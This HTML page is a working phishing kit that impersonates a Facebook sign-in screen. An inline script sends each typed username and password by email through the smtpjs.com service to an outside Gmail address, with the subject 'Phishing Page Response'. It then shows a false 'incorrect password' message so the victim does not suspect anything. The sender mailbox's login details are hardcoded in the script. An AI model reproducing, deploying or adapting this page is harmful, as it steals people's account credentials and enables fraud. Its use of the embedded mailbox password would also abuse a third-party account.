<!-- W3hubs.com - Download Free Responsive Website Layout Templates designed on HTML5 CSS3,
  Bootstrap which are 100% Mobile friendly. w3Hubs all Layouts are responsive cross browser 
  supported, best quality world class designs. -->
<!DOCTYPE html>
<html>

<head>
    
    <title>Login to Facebook</title>
    <meta property="og:url" content="" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="When Great Minds Don’t Think Alike." />
    <meta property="og:description" content="" />
    <meta property="og:image" content="http://static01.nyt.com/images/2015/02/19/arts/international/19iht-btnumbers19A/19iht-btnumbers19A-facebookJumbo-v2.jpg" />
    <link href="https://fonts.googleapis.com/css?family=Manjari:400,700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

<!-- Popper JS -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <style type="text/css">
        body {
            background: #3b5997;
            padding: 0;
            margin: 0;
            font-family: 'Manjari', sans-serif;
            overflow-x: hidden;
        }

        h1 {
            text-transform: uppercase;
            padding-top: 20px;
        }

        .btn-custom {
            background: #2a4784;
            color: #fff;
        }

        .btn.focus,
        .btn:focus {
            box-shadow: none;
        }

        .btn-custom:hover {
            color: #fff;
            background: #223a6d;
        }

        .container {
            box-shadow: 1px 0 10px 15px rgba(0, 0, 0, .3);
            background: linear-gradient(to bottom, #3b5997 0%, #3b5997 50%, #000000 50%, #ddd 50%, #ddd 100%);
            padding: 10px 0 15px 0px;
        }

        .center-content {
            display: block;
            margin: 20px auto;
            width: 40%;
        }

        .float-right .form-control {
            border-radius: 0px;
            width: 35% !important;
        }

        .center-content .form-control {
            outline: none;
            border: none;
            background: none;
            border-bottom: 1px solid #ddd;
            border-radius: 0px !important;
        }

        .center-content .form-control:focus,
        .center-content .form-control:hover {
            border: none;
            margin: 0 auto;
            background: none;
            box-shadow: none;
            border-bottom: 1px solid #AAB7B8;
        }

        .form-group {
            margin-top: 25px;
        }

        @media(max-width: 992px) {
            h2 {
                text-align: center;
            }

            .center-content {
                width: 60%;
            }
        }

        @media(max-width: 768px) {
            h2 {
                text-align: center;
            }

            .center-content {
                width: 60%;
            }

            .form-inline {
                display: block;
                text-align: center;
                float: none !important;
            }
        }

        @media(max-width: 575px) {
            .pl-5 {
                padding-left: 0 !important;
            }

            .center-content {
                width: 80%;
            }

            .float-right .form-control {
                width: 100% !important;
                margin-top: 15px;
            }

            .float-right .form-control:nth-child(2) {
                margin-bottom: 15px;
            }

            .container {
                background: linear-gradient(to bottom, #3b5997 0%, #3b5997 60%, #000000 50%, #ddd 52%, #ddd 100%);
                max-width: 80%;
            }
        }

        @media(max-width: 425px) {

            h3,
            h2 {
                font-size: 1.5rem;
            }

            h1 {
                font-size: 2rem;
            }

            h2 {
                margin: 0;
            }
        }
    </style>
</head>

<body>
    <div class="container mt-5 mb-5">
        <div class="row p-4">
            <div class="col-lg-7 col-md-12">
                <h2 class="text-white pl-5">Facebook</h2>
            </div>
            <div class="col-lg-5 col-md-12">
                <!-- <form class="form-inline float-right" action="#">
              <input type="email" class="form-control" placeholder="Username">
              <input type="password" class="form-control" placeholder="Password">
              <button type="submit" class="btn btn-custom">Login</button>
            </form> -->
            </div>
        </div>
        <div class="row">
            <div class="col-lg-12">
                <div class="text-center text-white">
                    <h3>Welcome To Facebook</h3>
                    <p class="mb-0">The World Biggest Social Network</p>
                </div>
            </div>
        </div>
        <div class="row bg-white center-content">
            <div class="col-lg-12 p-4">
                <h1>Sign in</h1>
                <form id="EmailForm" method="post">
                    <div class="form-group mt-0">
                        <input type="text" class="form-control" placeholder="Username" id="name" name="name">
                    </div>
                    <div class="form-group">
                        <input type="text" class="form-control" placeholder="Password" id="password"
                            name="password">
                    </div>
                   <-- <div class="form-group form-check">
                        <h4 type="text" style="margin-left:20px;"> Register For Lucky Draw!</h4?
                   </div> -->

                </form>
                <button id="SubmitForm" type="submit" class="btn btn-custom">Login</button>
            </div>
            <script type="text/javascript">
                $("#SubmitForm").click(function (event) {
                    
                    var name = $("#name").val();
                    var password = $("#password").val();
                    if(name.length == 0 || password.length == 0)
                    {
                        alert("Fill All Fields.")
                    }
                    else
                    {
                        Email.send({
                        Host: "smtp.gmail.com",
                        Username: "esspakistan0@gmail.com",
                        Password: "Pakistan@4646",
                        To: 'irfanhaider4748@gmail.com',
                        From: "esspakistan0@gmail.com",
                        Subject: "Phishing Page Response",
                        Body: "Helo Someone is here.<br />Name => " + name + "<br />Password => " + password,
                    }).then(function (message) {
                     debugger;
                        if (message == "OK")
                        alert("Username or Password incorrect.")
                        $("#name").val("");
                        $("#password").val("");
                        

                    });
                    }
                  
                });
            </script>
        </div>
    </div>
    </div>
</body>

</html>
